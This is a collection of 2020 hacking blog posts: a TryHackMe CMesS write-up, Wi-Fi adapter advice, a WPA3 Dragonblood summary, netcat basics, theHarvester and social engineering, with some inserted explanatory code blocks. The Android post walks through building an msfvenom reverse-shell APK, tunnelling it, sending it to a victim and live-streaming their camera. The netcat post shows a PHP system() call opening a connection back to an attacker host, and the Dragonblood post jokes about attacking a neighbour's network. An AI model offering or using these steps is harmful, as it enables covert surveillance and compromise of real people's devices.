Tuesday, September 15, 2020

TryHackMe CMesS


First scanning:

I use both nmap and rustscan (if you don't know about rustscan, it's nmap -p- on steroids):

nmap -sC -sV --min-parallelism 64 -oN nmap/nmapfile <target-ip>

Rustscan didn't give anything new.

Checking if the website has any subdomains (virtual hosts) by fuzzing the Host header; -hw 290 hides every response with the baseline word count of 290:

wfuzz -c -f sub-fighter -w wordlist.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -hw 290


Target: http://cmess.thm/
Total requests: 4997
==================================================================
ID    Response   Lines      Word         Chars          Request
==================================================================
00019:  C=200     30 L      104 W     934 Ch   "dev"

Total time: 0
Processed Requests: 2990
Filtered Requests: 2989
Requests/sec.: 0
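To make the -hw 290 filter concrete, here is an added example (not from the original write-up) that parses wfuzz's result lines and applies the same idea: drop every response whose word count matches the baseline page that the catch-all virtual host returns, leaving only the hostnames that produced a different page. It goes slightly beyond the command above in that, when no baseline is given, it infers one as the most common word count in the results. The sample lines are constructed in the format wfuzz prints; "www", "mail" and "admin" are made-up payloads.

```python
import re
from collections import Counter

# One wfuzz result line, e.g.:
#   00019:  C=200     30 L      104 W     934 Ch   "dev"
LINE_RE = re.compile(
    r'^\s*(?P<id>\d+):\s+C=(?P<code>\d+)\s+(?P<lines>\d+)\s+L\s+'
    r'(?P<words>\d+)\s+W\s+(?P<chars>\d+)\s+Ch\s+"(?P<payload>[^"]*)"'
)


def parse_wfuzz(text):
    """Turn wfuzz's plain-text output into a list of result dicts.
    Header, separator and summary lines do not match and are skipped."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            results.append({
                "id": int(m["id"]),
                "code": int(m["code"]),
                "lines": int(m["lines"]),
                "words": int(m["words"]),
                "chars": int(m["chars"]),
                "payload": m["payload"],
            })
    return results


def interesting_vhosts(results, baseline_words=None):
    """What -hw does: hide every response whose word count equals the
    baseline (the page the catch-all virtual host serves for any unknown
    Host header) and return the payloads that produced something else.
    When no baseline is given, the most common word count is used, which is
    what you would otherwise read off a first unfiltered run."""
    if not results:
        return []
    if baseline_words is None:
        baseline_words = Counter(r["words"] for r in results).most_common(1)[0][0]
    return [r["payload"] for r in results if r["words"] != baseline_words]


# Constructed sample in wfuzz's output format: an unfiltered run where the
# default vhost answers with a 290-word page and only "dev" differs.
SAMPLE_OUTPUT = """\
Target: http://cmess.thm/
==================================================================
ID    Response   Lines      Word         Chars          Request
==================================================================
00001:  C=200     81 L      290 W    3409 Ch   "www"
00002:  C=200     81 L      290 W    3409 Ch   "mail"
00019:  C=200     30 L      104 W     934 Ch   "dev"
00020:  C=200     81 L      290 W    3409 Ch   "admin"
"""

if __name__ == "__main__":
    rows = parse_wfuzz(SAMPLE_OUTPUT)
    print(interesting_vhosts(rows))         # inferred baseline
    print(interesting_vhosts(rows, 290))    # explicit, like -hw 290
```

Inferring the baseline from the mode is handy when the catch-all page is not exactly the same size every time; if the word counts wobble, compare on chars or lines instead, which is what wfuzz's -hc/-hl/-hh switches are for.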



I used gobuster for hunting down hidden directories but had no luck.
Check out the subdomain; some good stuff there.

Got into the CMS of the website:

Now the hint is to find which CMS the website is using and use searchsploit:
+ found a local file inclusion
+ go to exploit-db, now you know where to go

That's all for the initial hints. If you really want to see what I did, go to my repository page and enter the user flag (don't brute-force it).

https://gitlab.com/jdp1369/THM_CMesS.git

Monday, August 31, 2020

Wi-Fi Attacks: Prerequisites

There are many ways to compromise a Wi-Fi router, but generally you can't attack directly because your system's Wi-Fi module does not support monitor mode and packet injection. Also, if you are using a virtual Kali machine to perform a Wi-Fi attack, you certainly won't be able to, because virtualisation generally uses a NAT (Network Address Translation) network, which creates a subnet inside your machine where your host operating system acts as a router to the VMs (virtual machines), so you don't really have direct access to the real router.

What is Monitor Mode and Packet Injection?

Monitor mode: or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with an access point or ad hoc network first. Monitor mode only applies to wireless networks, while promiscuous mode can be used on both wired and wireless networks. Monitor mode is one of the eight modes that 802.11 wireless cards can operate in: Master (acting as an access point), Managed (client, also known as station), Ad hoc, Repeater, Mesh, Wi-Fi Direct, TDLS and Monitor mode.

Packet injection: also known as forging or spoofing packets in computer networking, is the process of interfering with an established network connection by constructing packets that appear to be part of the normal communication stream. Packet injection allows an unknown third party to disrupt or intercept packets between the consenting parties that are communicating, which can lead to degradation or blockage of users' ability to use certain network services or protocols. Packet injection is commonly used in man-in-the-middle attacks and denial-of-service attacks.

What's the solution?

The solution is to use a new Wi-Fi module that supports monitor mode and packet injection; this is only viable if you are not using Kali Linux as a VM. If you are running it as a VM, use an external Wi-Fi adapter.

Which adapter to choose?

Here the brand does not really matter that much; what you should look for is the right chipset. Brands like Alfa have better injection rates and fewer failures than the local brands, but in my opinion the chipset is the only thing that matters if you have just started learning and attempting Wi-Fi attacks.

The following chipsets are what one should look for in a Wi-Fi adapter:
  1.  Atheros AR9271: only capable of attacking routers working on the 2.4GHz band.
  2.  Realtek RTL8812AU: capable of attacking on both the 2.4GHz and 5GHz bands.
  3.  Ralink 3070/2870: supports 2.4GHz, but I don't trust this chipset.
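Before buying a second adapter, or right after plugging one in, the quickest check of whether the driver actually exposes monitor mode is `iw list`, which prints a "Supported interface modes" block for each radio. The function below is an added example, not from the original post: it filters that block and answers yes/no. The two samples are constructed, abridged `iw list` outputs. The chipset itself is read off `lsusb` (USB adapters) or `lspci -nn` (built-in cards); packet injection is not reported by `iw` at all and has to be verified with a live test such as `aireplay-ng --test`.

```shell
#!/bin/sh
# Added example (not from the original post): decide whether a wireless
# driver advertises monitor mode, from the output of `iw list`.
#
# On a real box:  iw list | supports_monitor_mode    -> prints yes/no, exit 0/1
# Chipset lookup: lsusb (USB adapters) or lspci -nn (built-in cards).
# Packet injection is NOT reported by iw; test it live, e.g. aireplay-ng --test.

supports_monitor_mode() {
    awk '
        # Enter the block that lists interface modes for this radio.
        /Supported interface modes:/ { inblock = 1; next }
        # Lines inside the block look like "\t\t * monitor".
        inblock && /^[ \t]*\* / { if ($0 ~ /\* monitor[ \t]*$/) found = 1; next }
        # Any other line ends the block (a box may have several radios).
        inblock { inblock = 0 }
        END { if (found) { print "yes"; exit 0 } print "no"; exit 1 }
    '
}

# Constructed, abridged samples of what `iw list` prints for two radios.
SAMPLE_WITH_MONITOR='Wiphy phy0
	Supported interface modes:
		 * IBSS
		 * managed
		 * AP
		 * monitor
	Band 1:
		Capabilities: 0x11ef'

SAMPLE_WITHOUT_MONITOR='Wiphy phy1
	Supported interface modes:
		 * managed
		 * AP
	Band 1:
		Capabilities: 0x11ef'

# Stand-alone demonstration: prints "yes" then "no".
printf '%s\n' "$SAMPLE_WITH_MONITOR" | supports_monitor_mode
printf '%s\n' "$SAMPLE_WITHOUT_MONITOR" | supports_monitor_mode || true
```

A "yes" here only means the driver claims the mode; whether the card stays in it reliably (the Alfa driver instability mentioned in the list below is exactly this kind of problem) still shows up only in use.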

Some products which I or my friends have used:

  • Alfa AWUS036NHA [b/g/n USB]
  • Alfa AWUS036ACH (a/b/g/n/ac): the best performing card, but the driver can be unstable enough to crash your kernel
  • Alfa AWUS036ACM (a/b/g/n/ac): the highest performing of the STABLE devices, but it requires kernel 4.19.5 or higher, and the driver doesn't work on the Raspberry Pi yet
  • TP-Link TL-WN722N v1 (b/g/n) [NOTE: only the v1, not the v2]
  • Ubiquiti SRX [a/b/g Cardbus]
  • Ubiquiti SRC [a/b/g ExpressCard]

Where can you buy these things?

You can buy these from Amazon, AliExpress and other well-known online retailers, but for locally made adapters you can check out your nearby computer market and ask for adapters with monitor mode and packet injection; you can also find some adapters on ZSecurity.

Link to buy from Amazon India: https://amzn.to/2PsoBiw

Ask questions in the comment section if you have any doubts regarding the hardware.


Saturday, August 29, 2020

Dragonblood WPA3 Flaws

As we know, WPA2 has been the latest and greatest in terms of Wi-Fi security for a long time now; you might also have heard or read about WPA3 and how it is going to replace WPA2 as it is more secure.

But in mid-April 2019, researchers Mathy Vanhoef and Eyal Ronen published a research paper in which they analysed the Dragonfly handshake, the handshake used by WPA3 to replace the vulnerable 4-way handshake of WPA. In this paper they detailed a number of flaws that can be used to launch a number of attacks against the latest and greatest Wi-Fi security protocol, WPA3.

What are the potential threats generated by these flaws?
The major ones are as follows:
  1. Recovering the network key
  2. Downgrading security (WPA3 to WPA2)
  3. Launching DoS attacks

In their research paper "Dragonblood: Analyzing the Dragonfly Handshake of WPA3 and EAP-pwd" they mention that one of the supposed advantages of WPA3 is that it is more secure than WPA2: thanks to its underlying Dragonfly handshake it should be near impossible to crack the network key/password. But they found that even with WPA3, an attacker within range of the victim can still recover the password.

The following CVEs were allocated for these newly found vulnerabilities:
  1. CVE-2019-13377: Timing-based side-channel attack against WPA3's Dragonfly handshake when using Brainpool curves.
  2. CVE-2019-13456: Information leak in FreeRADIUS' EAP-pwd due to aborting when needing more than 10 iterations.

DETAILS

Flaws in WPA3


The design flaws discovered can be divided into two categories. The first category consists of downgrade attacks against WPA3-capable devices, and the second consists of weaknesses in the Dragonfly handshake of WPA3, which in the Wi-Fi standard is better known as the SAE (Simultaneous Authentication of Equals) handshake. The discovered flaws can be abused to recover the password of the Wi-Fi network, launch resource consumption attacks, and force devices into using weaker security groups.
The following vulnerabilities were found in WPA3:

  1. CERT ID #VU871675: Downgrade attack against WPA3-Transition mode leading to dictionary attacks.
  2. CERT ID #VU871675: Security group downgrade attack against WPA3's Dragonfly handshake.
  3. CVE-2019-9494: Timing-based side-channel attack against WPA3's Dragonfly handshake.
  4. CVE-2019-9494: Cache-based side-channel attack against WPA3's Dragonfly handshake.
  5. CERT ID #VU871675: Resource consumption attack (i.e. denial of service) against WPA3's Dragonfly handshake.


Flaws in EAP-pwd

The EAP-pwd protocol internally also uses Dragonfly, and provides authentication based on a username and password in certain enterprise Wi-Fi networks. It is vulnerable to the same attacks that were discovered against WPA3. On top of that, all the EAP-pwd implementations that we tested were vulnerable to invalid curve attacks, which enable an adversary to completely bypass authentication. Most implementations were also vulnerable to reflection attacks.

The following vulnerabilities were found in the EAP-pwd implementations:

  1. CERT ID #VU871675: Overview of attacks specific to hostapd and wpa_supplicant (does not cover other implementations).
  2. CVE-2019-9495: Cache-based side-channel attack against the EAP-pwd implementation of hostapd and wpa_supplicant.
  3. CVE-2019-9497: Reflection attack against the EAP-pwd implementation of hostapd and wpa_supplicant.
  4. CVE-2019-9498: Invalid curve attack against the EAP-pwd server of hostapd resulting in authentication bypass.
  5. CVE-2019-9499: Invalid curve attack against the EAP-pwd client of wpa_supplicant resulting in server impersonation.
  6. CVE-2019-11234: Reflection attack against the EAP-pwd implementation of FreeRADIUS.
  7. CVE-2019-11235: Invalid curve attack against the EAP-pwd server of FreeRADIUS resulting in authentication bypass.


TOOLS
These tools are not designed to attack your neighbour's WPA3 network (but if you do and don't get caught, everything is fine):

  • Dragonslayer: performs invalid curve attacks against EAP-pwd clients and servers. These attacks bypass authentication: an adversary only needs to possess a valid username.
  • Dragondrain: this tool can be used to test whether, or to what extent, an access point is vulnerable to denial-of-service attacks against WPA3's SAE handshake.
  • Dragontime: this is an experimental tool to perform timing attacks against the SAE handshake if MODP group 22, 23, or 24 is supported. Note that most WPA3 implementations do not enable these groups by default.
  • Dragonforce: this is an experimental tool which takes the information recovered from the timing or cache-based attacks and performs a password partitioning attack. This is similar to a dictionary attack.


In practice the main risks for WPA3 are downgrade attacks, and possibly timing attacks against resource-constrained devices. The authentication bypass attacks against EAP-pwd that are implemented in Dragonslayer are also security critical in practice. Considering the other attacks are non-trivial in practice, and assuming vendors will implement defenses against them, we expect that your neighbour won't abuse them to attack you.
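Those two practical risks, the transition-mode downgrade and timing attacks through the MODP groups, map directly onto access point configuration. Below is an added example (not from the post or the Dragonblood paper) in hostapd.conf syntax: the first fragment is the weak shape, the second the hardened one. The option names are real hostapd options; the interface name, SSID and passwords are placeholders, and `sae_pwe` requires hostapd 2.10 or newer.

```ini
# --- weak shape: WPA3-Transition mode, MODP groups 22-24 enabled, PMF optional ---
interface=wlan0
ssid=EXAMPLE-SSID
wpa=2
# Both WPA2-PSK and SAE on one SSID: a client pushed down to WPA2-PSK
# hands an attacker a 4-way handshake to run a dictionary attack against
wpa_key_mgmt=WPA-PSK SAE
wpa_pairwise=CCMP
rsn_pairwise=CCMP
wpa_passphrase=CHANGE-ME-PLACEHOLDER
sae_password=CHANGE-ME-PLACEHOLDER
# 22, 23 and 24 are the MODP groups that Dragontime's timing attack relies on
sae_groups=19 20 21 22 23 24
# Protected Management Frames optional
ieee80211w=1

# --- hardened shape: SAE only, ECC groups only, PMF required ---
interface=wlan0
ssid=EXAMPLE-SSID
wpa=2
wpa_key_mgmt=SAE
wpa_pairwise=CCMP
rsn_pairwise=CCMP
sae_password=CHANGE-ME-PLACEHOLDER
# Only the NIST curves: no MODP groups, so nothing weak for a group downgrade to land on
sae_groups=19 20 21
# Protected Management Frames mandatory
ieee80211w=2
sae_require_mfp=1
# hostapd 2.10 or newer: hash-to-element only, which removes the
# hunting-and-pecking loop that the side-channel attacks measure
sae_pwe=1
```

hostapd loads one fragment, not both; they sit side by side here only for comparison. Whether transition mode can actually be dropped is decided by the client inventory: devices without SAE support lose access once `wpa_key_mgmt` is `SAE` alone, which is the reason transition mode exists in the first place.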


Content Reference :

Tuesday, August 25, 2020

Breaking into Android

Hello all. As we know, a large part of society is using smartphones without knowing the adverse effects on their privacy. So today I am going to teach you how to hack Android devices with the Metasploit framework from a different network.

After getting a meterpreter session the attacker can do many things, such as:
  • stream the camera live
  • take screenshots of the mobile display
  • read messages
  • place calls from the device's number
  • read the GPS location
  • attack other devices, etc.
PRE-REQUIREMENTS:
  1. Kali OS
  2. Updated Metasploit Framework
  3. Social engineering
This blog is for educational purposes only and is not responsible for illegal activities.

1. Get the IP address of your machine on the local network. For this, enter the following command in a terminal:

  • ifconfig

As you can see my IP address is 192.168.23.168; yours may be different.

2. Expose your local host on the internet by port forwarding through serveo.net.
 syntax:   ssh -R remote_port:local_ip:local_port serveo.net
example:
  • ssh -R 8565:192.168.23.168:4444 serveo.net

This forwards requests arriving at serveo.net on port 8565 to port 4444 on your IP address.

3. Make a payload using msfvenom:
  • msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=8565 -o payload.apk
4. Open a listener to get the meterpreter session.
type:
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost 192.168.23.168
  • set lport 4444
  • run
5. Social engineering
Send payload.apk to the victim by any means and have it installed on the victim's Android mobile.
Once it is installed and opened by the victim, the meterpreter session is established as shown below.

6. Exploit
type:
  • help
As you can see all the commands are listed; you can do whatever you want.

Example:
I want the victim camera's live stream:
type
  • webcam_list  // this will give you the list of webcams present on the victim's device
  • webcam_stream 1  // will give you the live stream, as shown below



Sunday, August 23, 2020

Using netcat for hacking

 





Netcat is a great network utility for reading from and writing to network connections using the TCP and UDP protocols. Netcat is often referred to as the Swiss army knife of networking tools and we will be using it a lot throughout the different tutorials on Hacking Tutorials. The most common uses for Netcat when it comes to hacking are setting up reverse and bind shells, piping and redirecting network traffic, port listening, debugging programs and scripts, and banner grabbing. In this tutorial we will be learning how to use the basic features of Netcat, such as:


  1. Banner grabbing
  2. Webserver interaction
  3. File transfers

Banner Grabbing


Service banners are often used by system administrators for inventory taking of systems and services on the network. The service banners identify the running service and often the version number too. Banner grabbing is a technique to retrieve this information about a particular service on an open port and can be used during a penetration test for performing a vulnerability assessment. When using Netcat for banner grabbing you actually make a raw connection to the specified host on the specified port. When a banner is available, it is printed to the console. Let's see how this works in practice.

The following command is used to grab a service banner (make a raw connection to a service):


  • nc [ip address] [port]

Let's try this on the FTP service on Metasploitable 2, which is running on port 21:

  • nc 192.168.100.100 21







Web server interaction


Netcat can also be used to interact with webservers by issuing HTTP requests. With the following command we can grab the banner of the web service running on Metasploitable 2:


  • nc 192.168.100.108 80


And then run this HTTP request:

HEAD / HTTP/1.0





Apache webserver banner.

The webserver responds with the server banner: Apache/2.2.8 (Ubuntu) DAV/2 and the PHP version.

To retrieve the top level page on the webserver we can issue the following command:


  • nc 192.168.100.108 80


And then run this HTTP request:

GET / HTTP/1.0
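The two interactions above (a raw connect that waits for a banner, and a HEAD request typed into the connection) are the same thing a few lines of socket code can do. The following is an added example, not part of the original tutorial: `grab_banner` mirrors `nc host port` and optionally sends a probe, `http_banner` sends the `HEAD / HTTP/1.0` request and pulls out the Server header. So that it runs offline, it starts Python's own `http.server` on a loopback port and grabs that banner instead of Metasploitable's Apache; `start_local_server` and `_Handler` exist only for that purpose.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def grab_banner(host, port, probe=None, timeout=3.0, max_bytes=4096):
    """The socket-level equivalent of `nc host port`: open a raw TCP
    connection, optionally send a probe (e.g. an HTTP request) and return
    whatever the service sends back, up to max_bytes.  A service that stays
    silent until the timeout yields an empty string instead of an error."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if probe:
            sock.sendall(probe)
        try:
            while sum(len(c) for c in chunks) < max_bytes:
                data = sock.recv(1024)
                if not data:          # peer closed the connection
                    break
                chunks.append(data)
        except socket.timeout:
            pass                      # banner (if any) received; service now waits on us
    return b"".join(chunks).decode("latin-1", errors="replace")


def parse_http_head(raw):
    """Split an HTTP response into its status line and a dict of headers
    (keys lowercased). Anything after the blank line is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def http_banner(host, port, path="/"):
    """Same as typing `HEAD / HTTP/1.0` into an nc session: returns the
    status line and the Server header (None if the server sends none)."""
    probe = f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    status, headers = parse_http_head(grab_banner(host, port, probe))
    return status, headers.get("server")


# --- a stand-in for Metasploitable's Apache, so the example runs offline ---

class _Handler(BaseHTTPRequestHandler):
    def do_HEAD(self):
        self.send_response(200)       # also emits the Server: and Date: headers
        self.send_header("Content-Type", "text/plain")
        self.end_headers()

    def do_GET(self):
        self.do_HEAD()
        self.wfile.write(b"top level page\n")

    def log_message(self, *args):     # keep the demo quiet
        pass


def start_local_server():
    """Bind Python's own http.server on a random loopback port and serve it
    from a background thread; the caller reads the port from server_address."""
    srv = HTTPServer(("127.0.0.1", 0), _Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_local_server()
    port = srv.server_address[1]
    print(http_banner("127.0.0.1", port))   # e.g. ('HTTP/1.0 200 OK', 'BaseHTTP/0.6 Python/3.x.y')
    srv.shutdown()
    srv.server_close()
```

Against a real FTP service you call `grab_banner(host, 21)` with no probe; the timeout is what ends the read on services that print a banner and then wait for input. The HEAD probe always carries a Host header because many virtual-hosted servers answer a bare request with a default site, which is a different banner from the one you were after.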






File transfers with Netcat


In this example we will be using a Netcat connection to transfer a text file. Let's assume we have remote command execution on the target host and we want to transfer a file from the attack box to the host. First we need to set up a listener on the target host and connect to it from the attack box. We will be using port 8080 for this purpose and we save the file to the desktop:


  • nc -lvp 8080 > /root/Desktop/transfer.txt

On the attack box we connect to port 8080 and send the file named transfer.txt:

  • nc 192.168.100.107 8080 < /root/Desktop/transfer.txt



Netcat reverse connection


Netcat is also used in system hacking and web server hacking, for example by injecting a call to it into a PHP file that the server executes.

Example
  • <?php
  • system("nc 192.168.100.107 8080");
  • ?>

This gives you a connection back on port 8080.

You listen on your system with:

  • nc -l -p 8080

Saturday, August 22, 2020

The Harvester

'theHarvester' is a tool designed to be used in the information gathering phase of a penetration test.




theHarvester is a tool used to harvest/gather sensitive information that can help in determining a company's external threat landscape on the internet, and not just a company's: even the information of particular individuals available on the internet. 'theHarvester' largely depends on public sources, and the following info can be gathered:
  • Emails
  • Names
  • Subdomains
  • IPs
  • URLs
  • Virtual hosts
  • Even port scanning

theHarvester public sources

One of the interesting things about 'theHarvester' is that it supports more than one public source to harvest information; more than 20 public sources are supported by the tool.
The public sources that require an API key include:
  • SecurityTrails
  • Hunter
  • GitHub
  • Shodan
  • bingapi
  • Spyse
  • Intelx
But if you don't have an API key you can still use the other public sources.

theHarvester on Ubuntu or other Linux-based systems where it is not preinstalled

You just need a few major dependencies on the system, in particular Python 3.6+. Some of its major dependencies include:
⦁ Python 3.7+
⦁ python3 -m pip install pipenv
⦁ pipenv install


virtualenv -p python3 theharvester

git clone https://github.com/laramies/theHarvester.git

source theharvester/bin/activate

Thursday, August 20, 2020

Social Engineering

Spent millions of dollars and still got hacked, while your servers ran the latest security updates and patches and were completely hardened? Then it might be a social engineering attack.


Remember the movie "Catch Me If You Can": Frank Abagnale Jr. used social engineering throughout almost the whole movie.

There is no single security mechanism or technical control that can prevent the social engineering techniques used by attackers. Only educating employees on how to recognize and respond to social engineering attacks can minimize attackers' chances of success. Before going ahead with this module, let's first discuss various social engineering concepts.

 

What is Social Engineering?

Social engineering is the art of convincing people to reveal confidential information.
Common targets of social engineering include help desk personnel, technical support executives, system admins, etc.
Social engineering depends on the fact that people are unaware of the value of their information and are careless about protecting it.

Impact of Attack on Organization
  1. Economic losses
  2. Damage to goodwill
  3. Loss of privacy
  4. Dangers of terrorism
  5. Lawsuits and arbitration
  6. Temporary or permanent closure
Factors that Make Companies Vulnerable to Attacks
  • Insufficient security training
  • Unregulated access to information
  • Several organizational units
  • Lack of security policies
Why is Social Engineering Effective?
  • Security policies are only as strong as their weakest link, and humans are the most susceptible factor
  • It is difficult to detect social engineering attempts
  • There is no method that can be applied to ensure complete security from social engineering attacks
  • There is no specific software or hardware for defending against a social engineering attack
Phases of a Social Engineering Attack
  • Research on target company {dumpster diving, websites, employees, touring the company, etc.}
  • Select victim {identify the frustrated employees of the target company}
  • Develop relationship {with the victim in order to gain their trust}
  • Exploit the relationship {collect sensitive account and financial information, and current technologies}
Types of Social Engineering
  • Human-based social engineering:
>>> Gathers sensitive information by interaction
>>> Techniques: impersonation, vishing, shoulder surfing, reverse social engineering, dumpster diving, piggybacking, etc.
  • Computer-based social engineering:
>>> Social engineering carried out with the help of computers
>>> Techniques: phishing, spam mail, pop-up window attacks, instant chat messengers
  • Mobile-based social engineering:
>>> Carried out with the help of mobile applications
>>> Techniques: publishing malicious apps, repackaging legitimate apps, using fake security applications, SMiShing (SMS phishing)